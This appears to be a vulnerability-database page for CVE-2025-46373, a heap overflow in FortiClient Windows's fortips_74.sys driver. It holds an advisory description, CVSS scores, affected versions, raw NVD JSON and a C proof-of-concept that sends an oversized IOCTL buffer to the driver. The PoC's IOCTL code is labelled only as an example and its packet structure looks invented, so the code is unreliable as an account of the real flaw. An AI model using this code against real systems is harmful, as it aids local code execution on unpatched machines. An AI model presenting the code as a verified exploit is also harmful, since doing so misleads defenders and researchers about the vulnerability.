Security Vulnerability Report
CVE-2025-46373 CVSS 7.8 HIGH

Published: 2025-11-18 17:16:02
Last Modified: 2025-12-16 11:15:52

Description

A heap-based buffer overflow vulnerability [CWE-122] in Fortinet FortiClientWindows 7.4.0 through 7.4.3 and FortiClientWindows 7.2.0 through 7.2.8 may allow an authenticated local IPSec user to execute arbitrary code or commands via "fortips_74.sys". The attacker would need to bypass the Windows heap integrity protections.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:forticlient:*:*:*:*:*:windows:*:* - VULNERABLE (FortiClient Windows 7.2.0 - 7.2.8)
cpe:2.3:a:fortinet:forticlient:*:*:*:*:*:windows:*:* - VULNERABLE (FortiClient Windows 7.4.0 - 7.4.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-46373 PoC - FortiClient Windows Heap Overflow
// This PoC demonstrates the heap overflow condition in fortips_74.sys
// Target: FortiClient Windows 7.2.0-7.2.8, 7.4.0-7.4.3
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <winioctl.h>

#define FORTIPS_DEVICE_NAME "\\\\.\\fortips74"
#define HEAP_OVERFLOW_PAYLOAD_SIZE 0x1000

// Malicious IPSec packet structure to trigger overflow
typedef struct {
    DWORD packet_length;
    DWORD flags;
    BYTE payload[HEAP_OVERFLOW_PAYLOAD_SIZE]; // Oversized payload
} MALICIOUS_IPSEC_PACKET;

// IOCTL code for IPSec processing (example)
#define IOCTL_FORTIPS_PROCESS_PACKET 0x9A0B1234

void trigger_heap_overflow() {
    HANDLE hDevice;
    DWORD bytesReturned;
    MALICIOUS_IPSEC_PACKET packet;

    printf("[*] Opening FortiClient fortips74 device...\n");
    hDevice = CreateFileA(
        FORTIPS_DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open device. Ensure FortiClient IPSec is running.\n");
        return;
    }

    printf("[*] Preparing malicious packet (size: %zu bytes)...\n", sizeof(packet));

    // Fill payload with controlled data to overwrite heap structures
    memset(&packet, 0x41, sizeof(packet)); // Fill with 'A' for debugging
    packet.packet_length = sizeof(MALICIOUS_IPSEC_PACKET);
    packet.flags = 0x00000001;

    printf("[*] Sending malicious packet to trigger heap overflow...\n");

    // Send oversized packet to trigger overflow in driver
    BOOL result = DeviceIoControl(
        hDevice,
        IOCTL_FORTIPS_PROCESS_PACKET,
        &packet,
        sizeof(packet),
        NULL,
        0,
        &bytesReturned,
        NULL
    );

    if (result) {
        printf("[+] Packet sent successfully\n");
    } else {
        printf("[+] IOCTL returned (overflow may have been triggered)\n");
    }

    CloseHandle(hDevice);
    printf("[*] PoC execution completed\n");
}

int main() {
    printf("CVE-2025-46373 PoC - FortiClient Windows Heap Overflow\n");
    printf("Target: FortiClient Windows 7.2.x / 7.4.x\n");
    printf("Author: Security Research Team\n\n");
    trigger_heap_overflow();
    return 0;
}

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-125 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46373", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:01.753", "lastModified": "2025-12-16T11:15:52.043", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Heap-based Buffer Overflow vulnerability [CWE-122] vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.3, FortiClientWindows 7.2.0 through 7.2.8 may allow an authenticated local IPSec user to execute arbitrary code or commands via \"fortips_74.sys\". The attacker would need to bypass the Windows heap integrity protections"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:forticlient:*:*:*:*:*:windows:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.9", "matchCriteriaId": "5557A33B-0705-4621-B729-BD087AB315AA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:forticlient:*:*:*:*:*:windows:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.4", "matchCriteriaId": "51121FCA-2CA9-4B4B-A27C-C4729AB797BB"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-125", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}